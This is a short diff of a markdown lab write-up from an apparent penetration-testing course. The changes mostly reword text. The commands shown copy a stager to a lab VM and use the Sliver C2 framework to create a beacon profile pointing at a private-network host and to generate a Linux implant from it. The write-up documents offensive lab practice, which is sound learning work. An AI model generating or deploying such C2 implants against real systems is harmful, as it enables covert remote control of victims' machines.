Ali-Mikael/Pen-testing/h6-shells.md

 $ rsync -av linuxStager vagrant@192.168.130.202:/home/vagrant
 ```

-## Clean table
+## We go again
 I created a new profile with format: `exe`
 ```console
 sliver > profiles new beacon -m 192.168.130.233 -o linux -f exe -e linuxServerExe
 ```
-(The `shellcode` payload did not work, I tried it..)
+(The `shellcode` payload does not work with our stager.
+I tried it..)

-Create the final payload using the profile:
+Generate the implant from the  profile:
 ```console
 sliver > profiles generate linuxServerExe -s /home/steve/box/sliver/payloads/linuxServerExe